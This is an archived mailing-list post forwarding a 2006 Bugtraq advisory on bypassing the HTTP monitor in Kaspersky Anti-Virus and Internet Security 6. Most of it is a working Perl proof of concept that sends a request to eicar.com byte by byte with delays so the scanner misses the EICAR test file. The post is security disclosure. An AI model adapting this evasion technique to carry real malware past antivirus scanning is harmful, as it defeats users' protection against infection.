ðòïåëôù 

  áòèé÷ 

Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  óôáôøé 

  ðåòóïîáìøîïå 

  ðòïçòáííù 

ðéûéôå
ðéóøíá














     áòèé÷ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] FW: Kaspersky antivirus 6: HTTP monitor bypassing

;-)  

> -----Original Message-----
> From: john@xxxxxxxxxx [mailto:john@xxxxxxxxxx] 
> Sent: Tuesday, May 23, 2006 12:10 AM
> To: bugtraq@xxxxxxxxxxxxxxxxx
> Subject: Kaspersky antivirus 6: HTTP monitor bypassing
> 
> Kaspersky antivirus 6
> Kaspersky internet security 6
> 
> www.kaspersky.com
> 
> Vulnerable Systems: KAV6, KIS6 
> 
> Detail:
> The vulnerability is caused due to HTTP parsing errors in the 
> HTTP monitor (Kaspersky Web-antivirus).
> Any mailicious software on local computer can bypass HTTP 
> virus monitor. 
> 
> Solution:
> There is no known solution.
> 
> Exploit code:
> 
> This perl script could be run with ActiveState Perl 5.8:
> 
> use IO::Socket::INET;
> use strict;
> 
> my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',
>                                   
> 'http://www.eicar.com/download/eicar.com' );
> 
> syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n";
> 
> my $s = IO::Socket::INET->new( PeerAddr => $h_srv,
>                                PeerPort => $h_port,
>                                Proto    => 'tcp' );
> die "socket: $!" unless $s;
> 
> sendthem( $s,
>           "GET $h_url HTTP/1.1",
>           "Host: $h_srv",
>           ""
>     );
> my $doc = read_body( $s, read_headers( $s ) );
> syswrite STDOUT,
>     'document is <'.$doc.'> len='.length($doc)."\n";
> 
> sub sendthem {
>     my $s = shift;
>     my $c = 0;
>     foreach( @_ ) {
>         my @a = split //, $_;
>         ++$c;
>         syswrite STDOUT, "query $c: ";
>         foreach( @a ) {
>             sendone( $s, $_ );
>         }
>         sendone( $s, "\r" );
>         sendone( $s, "\n" );
>     }
> }
> 
> sub sendone {
>     my( $s, $v ) = @_;
>     $s->syswrite( $v );
>     syswrite STDOUT, $v;
> # !!! comment next line to have monitoring working ;)
>     select( undef, undef, undef, 0.300 );
> }
> 
> sub read_headers {
>     my( $s ) = @_;
>     my( $c, $cl ) = ( 0, 0 );
>     for( ;; ) {
>         my $l = read_line( $s );
>         ++$c;
>         syswrite STDOUT, "header $c: $l";
>         syswrite STDOUT, "\r\n";
>         last if not $l and $c;
>         $cl = $1 if $l =~ /^Content-Length:\s+(\d+)/;
>     }
>     $cl;
> }
> 
> sub read_line {
>     my( $s ) = @_;
>     my $str = '';
>     for( ;; ) {
>         my $v = '';
>         my $r = $s->sysread( $v, 1 );
>         die 'EOF reading headers!' unless $r;
>         last if $v eq "\n";
>         next if $v eq "\r";
>         $str .= $v;
>     }
>     return $str;
> }
> 
> sub read_body {
>     my( $s, $cl ) = @_;
>     my( $str, $cli ) = ( '', $cl );
>     syswrite STDOUT, "reading body <content-length: $cli> ...\n"; 
>     for( ;; ) {
>         my $v = '';
>         my $r = $s->sysread( $v, 1 );
>         last unless $r;
>         $str .= $v;
>         --$cl if $cli;
>         last if not $cl and $cli;
>     }
>     return $str;
> }
>

 



Copyright © Lexa Software, 1996-2009.